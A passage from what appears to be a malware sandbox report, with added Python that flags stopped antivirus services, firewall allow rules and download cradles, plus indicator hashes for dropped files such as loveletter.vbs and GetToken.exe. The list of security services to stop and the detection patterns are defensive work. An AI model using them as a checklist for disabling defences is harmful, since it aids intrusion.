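    "norton antivirus corporate edition", "virobot professional monitoring",
    "pc-cillin personal firewall", "trend micro proxy service", "trend nt realtime service",
    "mcafee.com mcshield", "mcafee.com virusscan online realtime engine",
    "sygateservice", "sygate personal firewall pro", "sophos anti-virus",
    "sophos anti-virus network", "etrust antivirus job server",
    "etrust antivirus realtime server", "etrust antivirus rpc server", "mskservice",
}

# net.exe hands the work to net1.exe, so each stop appears twice in a tree;
# both are matched here, dedupe on service name if you alert per service.
NET_STOP = re.compile(r'^(?:.*\\)?net1?\s+stop\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
FW_ADD_RULE = re.compile(r'netsh\s+advfirewall\s+firewall\s+add\s+rule\b(.*)', re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(
    r'\.DownloadFile\(|\.DownloadString\(|Invoke-WebRequest|\biwr\b|Start-BitsTransfer', re.IGNORECASE)
URL = re.compile(r'https?://[^\s\'"]+', re.IGNORECASE)


def classify(cmdline):
    """Return [(tag, detail), ...] for one command line; [] if nothing matched."""
    findings = []
    m = NET_STOP.match(cmdline)
    if m:
        service = m.group(1) or m.group(2)
        key = service.lower()
        if key == "eventlog":
            findings.append(("stop_eventlog", service))
        elif key in SECURITY_SERVICES:
            findings.append(("stop_security_service", service))
        else:
            findings.append(("stop_service", service))
    m = FW_ADD_RULE.search(cmdline)
    if m:
        # netsh key=value pairs; a quoted value may contain spaces, an empty value is allowed
        args = {k.lower(): v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S*)', m.group(1))}
        if args.get("action", "").lower() == "allow":
            tag = "fw_allow_rule_empty_port" if args.get("localport", "") == "" else "fw_allow_rule"
            findings.append((tag, args.get("name", "")))
    if DOWNLOAD_CRADLE.search(cmdline):
        urls = URL.findall(cmdline)
        findings.append(("download_cradle", urls[0] if urls else ""))
    if re.search(r'\bOut-Printer\b', cmdline, re.IGNORECASE):
        findings.append(("out_printer", "Out-Printer"))
    return findings


def triage(cmdlines):
    """Per-tag counts over a whole tree, the shape a threshold rule works on."""
    counts = defaultdict(int)
    for line in cmdlines:
        for tag, _ in classify(line):
            counts[tag] += 1
    return dict(counts)


def verdict(counts, min_security_stops=3):
    """Reasons to alert; the threshold is this example's assumption, not the report's."""
    reasons = []
    if counts.get("stop_security_service", 0) >= min_security_stops:
        reasons.append("mass stop of security services")
    if counts.get("stop_eventlog"):
        reasons.append("event log service stopped")
    if counts.get("fw_allow_rule_empty_port") or counts.get("fw_allow_rule"):
        reasons.append("firewall allow rule added")
    if counts.get("download_cradle"):
        reasons.append("download cradle")
    if counts.get("out_printer"):
        reasons.append("note sent to printer")
    return reasons


if __name__ == "__main__":
    for line in PROCESS_TREE:
        for tag, detail in classify(line):
            print(f"{tag:26} {detail}")
    print(verdict(triage(PROCESS_TREE)))
```

Because `net.exe` always spawns `net1.exe` with the same arguments, a per-service alert should count distinct service names rather than raw matches, otherwise every stop is double counted; the counts returned by `triage()` deliberately keep both so that the caller can choose.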
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (7KB; listed seven times with identical digests)
  MD5    27b0f8bc25c423a48d7984322ff3404d
  SHA1   94673f66f91087d84cfa240668df0a2d60c8fa75
  SHA256 d1c172d4005223a144cb3a7f2ceb1ff2823634a9bb114d033a7c6cca083dde26
  SHA512 83d0687f2a7dcd99bca9aafb60cb17dba9423096196e1cc71b95b5faa5a81a395172792c2530f14c5af0603ccbcbd5382a93a855e0ec5c2146fd5fae2256d912

C:\Users\Admin\Desktop\YcynNote.txt (640B)
  MD5    2cc58ae8bf7d3567c76eaa4255b9d6d2
  SHA1   9e79c3d63fe9045377b2bc9e3b076c55b641af77
  SHA256 767731cff421a20ff59d9e1677b277c069c3eeb55ab2528e5dc7101a1254f448
  SHA512 696e20aaa75a767cfe81fbe46369877da2d252d9081a3959e6dd7184b1e2476da9b5fbdde197761897fc2504e955c4f294d3a1dfa12c95e843de91c91a55f983

C:\Users\Admin\Desktop\loveletter.vbs (495B)
  MD5    900ead69492d80e48738921eca28b14f
  SHA1   6b51607c54f8e734a7ea47091859c3e8dce6365c
  SHA256 c1a49c4801603e877e673620c289d709c5c2b368dae72e941f9649889faefab3
  SHA512 8fbb63ea9e5e2bca05bdbcf373056e58aaae2dfd180dfca2fdfdc2b706bb3923798f9878eddf7acef255676eda65f94cc9a827e8abcc9d4da6613f33d74861f2

C:\Users\Admin\Desktop\mail.vbs (488B)
  MD5    88ef4bc3f48eeb97aedadff8f3840980
  SHA1   48e8167bef2562d902885a075f6190d269fd3d35
  SHA256 b62346a7425cfec83d3f05fc4ff268510a16493479f09e7113169aaad5abeefa
  SHA512 523127a83202c86445825e1d8ab84a268e4f9b40a7c76b91b4947fb29de1c0819ba3e856bc1cbd40d6b0d10c04ca356a5e0dc975708a3d765ab425ab1a7d1024

C:\Users\Admin\Desktop\spreadusb.cmd (140B)
  MD5    591248610b25d51736f91c45f788cf6e
  SHA1   b810cf36ed55fa0ea44c2dafb273e2463fbbda56
  SHA256 cc1baa061feaf3f747f2d932f077629579f5ce7ec6018bbede7a3220a090a5d1
  SHA512 0cdbe0d5e2f618f9776cc698ca40d028e4cdbc24537179afde3eee08d13921907f34cedb30726858af36f5366d767a19180665053886646a187025e253912b99

C:\Users\Admin\Documents\2b2crypt.cmd (138B)
  MD5    8a0e18e8c3724921943bd90e6070dc8e
  SHA1   13ba409f261173c093918af6c786fe6d863164cf
  SHA256 ac34f2c032a70571a4d51ca8de3c7cee1ba51aadbddb0534fb358e9b312d2ca6
  SHA512 54c9e4aef02fb333c9e0af9dda2b2dbfe8bc9550f127051238d800e1e927e34ce272e457db591bbd6414d1fc703d5185ca557652e508e5dd3211a013cc85e34a

C:\Users\Admin\Documents\2b2crypt.m.cmd (142B)
  MD5    28057d0514c31373a5e6135b7b477196
  SHA1   719373c153c7a245bdcd6118330e38c15432eb20
  SHA256 3179106c4ec0e5fe5129399101c20d79dc9504f29a6e5fdbb0b507fa75d9a9eb
  SHA512 32952350e35b4ccb6115926ea117d3f8cc49d100a2e47a652f69b5c64f7cf2de2771d9b9b46f6d17cb30162e04022d280fb2d5a54ddd3c396b728623e4692596

C:\Users\Admin\Documents\GetToken.exe (8KB; listed twice with identical digests)
  MD5    2ed86e80ea9b4b95b3e52ed77ea6c401
  SHA1   5032e67b7c84362374b7d52507ab83ae03d7ebff
  SHA256 6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983
  SHA512 64fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71

C:\Users\Admin\Documents\NoKeyB.exe (1.2MB; listed twice, and once more as \Users\Admin\Documents\NoKeyB.exe, all with identical digests)
  MD5    6bc9c0340385a1ff2a8dd1b841415211
  SHA1   f7b4088b012271ed06c24392bbcb5f9eb75219c2
  SHA256 9df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13
  SHA512 9bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea

C:\Users\Admin\Documents\Tokens.txt (22B)
  MD5    3d74b4a3f6053a5a252f4faee7fb157e
  SHA1   576c1a2892dad89c3b6aba698ee67258be827eaf
  SHA256 445f09c32e44ec144320d929de814ceda449da7efa062a19c1cc78cde29fb139
  SHA512 dab16b5c564af14fb632f086b99530061d86f54cffed6bfa1b9ae59f97b77beec8ae89c132e2a217d555df512c75bb236921014ac0ff8053c88af16a96db7529

C:\Users\Admin\Documents\apps.txt (8KB)
  MD5    54d233cc9e2bbf4034df3da6e9c593e0
  SHA1   3a8e977d9e481d6ffeb3d8a38a3509d9a4da68cc
  SHA256 de92216e0d295e216904fdb5aadfd4a979da395000ff7bf70f31c2c8df42096f
  SHA512 fc85b2a109effe64c76576f750711a992fac3d98db690bef596a43baf5fc318143d49a109f8a5afe68f2b1bf9c4521987ad612b062eb8744bfee7922ee02750d

C:\Windows\win.ini (640B)
  MD5    37a42188327ced5450bd8ef9b5a16bbe
  SHA1   1f332e4ea66e55337808fb794b58ea4e182e1f19
  SHA256 4fb7375c44fab40f69801d65177027c52cdbb79fdcfb3a91d75c469f7fe0533d
  SHA512 3d0751688dc9026da234f1c61330782fbc20655ff8a810c2bf529db958e1d3fd3b9bce7d9e027edbe92c819b9074474e5e84775828a11721e9aeb05d85a0f363

\??\PIPE\srvsvc (no size recorded; listed three times with identical digests)
  MD5    d41d8cd98f00b204e9800998ecf8427e
  SHA1   da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
  These four values are the digests of zero bytes of input: the sandbox captured no content from the pipe, so they identify nothing and must not be loaded as indicators.
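Before the hashes above go into a blocklist, two hygiene steps are needed: the sandbox lists the same file several times (identical digests under the same path, and NoKeyB.exe once more under a path without the drive letter), and the `\??\PIPE\srvsvc` records carry the MD5, SHA-1, SHA-256 and SHA-512 of the empty input, that is, of no content at all. The Python below is an added example for this page, not part of the sandbox report: it parses records in the fused `LABELdigest` form the extracted page uses, merges duplicates by SHA-256 while keeping every path form seen, and drops empty-content records. The embedded records are a subset copied from the list above; the record layout and field names are the example's own.

```python
import hashlib

# Constructed input: a subset of the sandbox's Downloads list above, with each
# label fused to its digest exactly as the extracted report shows them.
RAW_RECORDS = r"""
C:\Users\Admin\Desktop\YcynNote.txt
MD52cc58ae8bf7d3567c76eaa4255b9d6d2
SHA19e79c3d63fe9045377b2bc9e3b076c55b641af77
SHA256767731cff421a20ff59d9e1677b277c069c3eeb55ab2528e5dc7101a1254f448
SHA512696e20aaa75a767cfe81fbe46369877da2d252d9081a3959e6dd7184b1e2476da9b5fbdde197761897fc2504e955c4f294d3a1dfa12c95e843de91c91a55f983
-
C:\Users\Admin\Documents\GetToken.exe
MD52ed86e80ea9b4b95b3e52ed77ea6c401
SHA15032e67b7c84362374b7d52507ab83ae03d7ebff
SHA2566ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983
SHA51264fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71
-
C:\Users\Admin\Documents\NoKeyB.exe
MD56bc9c0340385a1ff2a8dd1b841415211
SHA1f7b4088b012271ed06c24392bbcb5f9eb75219c2
SHA2569df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13
SHA5129bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea
-
\Users\Admin\Documents\NoKeyB.exe
MD56bc9c0340385a1ff2a8dd1b841415211
SHA1f7b4088b012271ed06c24392bbcb5f9eb75219c2
SHA2569df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13
SHA5129bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea
-
\??\PIPE\srvsvc
MD5d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
"""

# Longest label first so "SHA1" is never taken as a prefix of "SHA256" / "SHA512".
DIGEST_LEN = {"SHA512": 128, "SHA256": 64, "SHA1": 40, "MD5": 32}
HASHLIB_NAME = {"SHA512": "sha512", "SHA256": "sha256", "SHA1": "sha1", "MD5": "md5"}
# Digests of zero bytes of input; a record carrying these describes no content.
EMPTY_DIGEST = {label: hashlib.new(HASHLIB_NAME[label], b"").hexdigest() for label in DIGEST_LEN}
HEX = set("0123456789abcdef")


def split_label(line):
    """'SHA19e79...' -> ('SHA1', '9e79...'); None if the line is not a well-formed hash line."""
    for label, length in DIGEST_LEN.items():
        if line.startswith(label):
            digest = line[len(label):].lower()
            if len(digest) == length and set(digest) <= HEX:
                return label, digest
            return None
    return None


def parse_records(text):
    """One dict per path; '-' separators and malformed hash lines are ignored."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "-":
            continue
        if any(line.startswith(label) for label in DIGEST_LEN):
            parsed = split_label(line)
            if parsed and records:
                records[-1][parsed[0]] = parsed[1]
            continue
        records.append({"path": line})
    return records


def dedupe(records):
    """Merge records with the same SHA256, keeping every path form under which it was seen."""
    by_sha = {}
    for rec in records:
        key = rec.get("SHA256")
        if key is None:
            continue
        if key in by_sha:
            if rec["path"] not in by_sha[key]["paths"]:
                by_sha[key]["paths"].append(rec["path"])
        else:
            by_sha[key] = {"paths": [rec["path"]], **{k: v for k, v in rec.items() if k != "path"}}
    return list(by_sha.values())


def is_empty_content(rec):
    return any(rec.get(label) == EMPTY_DIGEST[label] for label in DIGEST_LEN)


def usable_iocs(records):
    """Deduplicated records minus zero-content ones: what is safe to load into a blocklist."""
    return [rec for rec in dedupe(records) if not is_empty_content(rec)]


if __name__ == "__main__":
    for rec in usable_iocs(parse_records(RAW_RECORDS)):
        print(rec["SHA256"], rec["paths"])
```

The empty-input check is computed with `hashlib` rather than hard-coded, so the same filter catches the empty digest for whichever algorithm a feed happens to carry; a feed that ships only one digest per record still gets filtered.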
memory/240-96-0x0000000000000000-mapping.dmp
memory/280-118-0x0000000000000000-mapping.dmp
memory/300-117-0x0000000000000000-mapping.dmp
memory/480-99-0x0000000000000000-mapping.dmp
memory/560-95-0x0000000000000000-mapping.dmp
memory/576-78-0x0000000000000000-mapping.dmp
memory/580-115-0x0000000000000000-mapping.dmp
memory/580-175-0x0000000001F04000-0x0000000001F07000-memory.dmp (12KB)
memory/580-176-0x0000000001F0B000-0x0000000001F2A000-memory.dmp (124KB)
memory/580-174-0x000007FEF3120000-0x000007FEF3C7D000-memory.dmp (11.4MB)
memory/588-127-0x0000000000000000-mapping.dmp
memory/612-73-0x0000000000000000-mapping.dmp
memory/612-121-0x0000000000000000-mapping.dmp
memory/628-122-0x0000000000000000-mapping.dmp
memory/780-98-0x0000000000000000-mapping.dmp
memory/832-84-0x0000000000000000-mapping.dmp
memory/840-76-0x0000000000000000-mapping.dmp
memory/876-93-0x0000000000000000-mapping.dmp
memory/912-56-0x0000000000000000-mapping.dmp
memory/912-61-0x00000000027FB000-0x000000000281A000-memory.dmp (124KB)
memory/912-112-0x0000000000000000-mapping.dmp
memory/912-57-0x000007FEFBFF1000-0x000007FEFBFF3000-memory.dmp (8KB)
memory/912-60-0x000000001B6E0000-0x000000001B9DF000-memory.dmp (3.0MB)
memory/912-59-0x00000000027F4000-0x00000000027F7000-memory.dmp (12KB)
memory/912-58-0x000007FEF3910000-0x000007FEF446D000-memory.dmp (11.4MB)
memory/956-101-0x0000000000000000-mapping.dmp
memory/964-55-0x0000000000000000-mapping.dmp
memory/1036-94-0x0000000000000000-mapping.dmp
memory/1064-86-0x0000000000000000-mapping.dmp
memory/1072-83-0x0000000000000000-mapping.dmp
memory/1076-108-0x0000000000000000-mapping.dmp
memory/1108-105-0x0000000000000000-mapping.dmp
memory/1116-81-0x0000000000000000-mapping.dmp
memory/1180-85-0x0000000000000000-mapping.dmp
memory/1228-110-0x0000000000000000-mapping.dmp
memory/1308-75-0x0000000000000000-mapping.dmp
memory/1316-97-0x0000000000000000-mapping.dmp
memory/1324-185-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp (11.4MB)
memory/1324-186-0x00000000024A4000-0x00000000024A7000-memory.dmp (12KB)
memory/1324-187-0x00000000024AB000-0x00000000024CA000-memory.dmp (124KB)
memory/1336-92-0x0000000000000000-mapping.dmp
memory/1404-123-0x0000000000000000-mapping.dmp
memory/1488-182-0x000000006C7E1000-0x000000006C7E3000-memory.dmp (8KB)
memory/1488-181-0x000000006CFF1000-0x000000006CFF3000-memory.dmp (8KB)
memory/1488-180-0x0000000073A7D000-0x0000000073A88000-memory.dmp (44KB)
memory/1488-179-0x0000000075DF1000-0x0000000075DF3000-memory.dmp (8KB)
memory/1488-178-0x000000005FFF0000-0x0000000060000000-memory.dmp (64KB)
memory/1488-124-0x0000000000000000-mapping.dmp
memory/1488-177-0x0000000072A91000-0x0000000072A93000-memory.dmp (8KB)
memory/1512-74-0x0000000000000000-mapping.dmp
memory/1528-54-0x0000000000000000-mapping.dmp
memory/1532-206-0x000007FEF3120000-0x000007FEF3C7D000-memory.dmp (11.4MB)
memory/1532-208-0x00000000027BB000-0x00000000027DA000-memory.dmp (124KB)
memory/1532-207-0x00000000027B4000-0x00000000027B7000-memory.dmp (12KB)
memory/1548-77-0x0000000000000000-mapping.dmp
memory/1548-125-0x0000000000000000-mapping.dmp
memory/1552-120-0x0000000000000000-mapping.dmp
memory/1584-87-0x0000000000000000-mapping.dmp
memory/1624-79-0x0000000000000000-mapping.dmp
memory/1632-193-0x0000000000AC0000-0x0000000000AC8000-memory.dmp (32KB)
memory/1632-216-0x0000000002AD4000-0x0000000002AD7000-memory.dmp (12KB)
memory/1632-217-0x0000000002ADB000-0x0000000002AFA000-memory.dmp (124KB)
memory/1632-214-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp (11.4MB)
memory/1632-215-0x000000001B840000-0x000000001BB3F000-memory.dmp (3.0MB)
memory/1632-219-0x000007FEECB60000-0x000007FEEDBF6000-memory.dmp (16.6MB)
memory/1636-103-0x0000000000000000-mapping.dmp
memory/1672-113-0x0000000000000000-mapping.dmp
memory/1716-202-0x000000001B740000-0x000000001BA3F000-memory.dmp (3.0MB)
memory/1716-200-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp (11.4MB)
memory/1716-203-0x000000000235B000-0x000000000237A000-memory.dmp (124KB)
memory/1716-201-0x0000000002354000-0x0000000002357000-memory.dmp (12KB)
memory/1720-104-0x0000000000000000-mapping.dmp
memory/1728-128-0x0000000000000000-mapping.dmp
memory/1736-197-0x000000000287B000-0x000000000289A000-memory.dmp (124KB)
memory/1736-194-0x000007FEF3120000-0x000007FEF3C7D000-memory.dmp (11.4MB)
memory/1736-196-0x0000000002874000-0x0000000002877000-memory.dmp (12KB)
memory/1740-80-0x0000000000000000-mapping.dmp
memory/1748-130-0x0000000000000000-mapping.dmp
memory/1752-109-0x0000000000000000-mapping.dmp
memory/1812-119-0x0000000000000000-mapping.dmp
memory/1812-71-0x00000000028BB000-0x00000000028DA000-memory.dmp (124KB)
memory/1812-66-0x0000000000000000-mapping.dmp
memory/1812-69-0x000007FEF2F70000-0x000007FEF3ACD000-memory.dmp (11.4MB)
memory/1812-70-0x00000000028B4000-0x00000000028B7000-memory.dmp (12KB)
memory/1824-126-0x0000000000000000-mapping.dmp
memory/1880-72-0x0000000000000000-mapping.dmp
memory/1884-82-0x0000000000000000-mapping.dmp
memory/1892-100-0x0000000000000000-mapping.dmp
memory/1896-90-0x0000000000000000-mapping.dmp
memory/1900-88-0x0000000000000000-mapping.dmp
memory/1924-106-0x0000000000000000-mapping.dmp
memory/1928-129-0x0000000000000000-mapping.dmp
memory/1952-91-0x0000000000000000-mapping.dmp
memory/1964-89-0x0000000000000000-mapping.dmp
memory/1996-114-0x0000000000000000-mapping.dmp
memory/2012-107-0x0000000000000000-mapping.dmp
memory/2016-63-0x0000000000000000-mapping.dmp
memory/2024-102-0x0000000000000000-mapping.dmp
memory/2028-111-0x0000000000000000-mapping.dmp
memory/2036-116-0x0000000000000000-mapping.dmp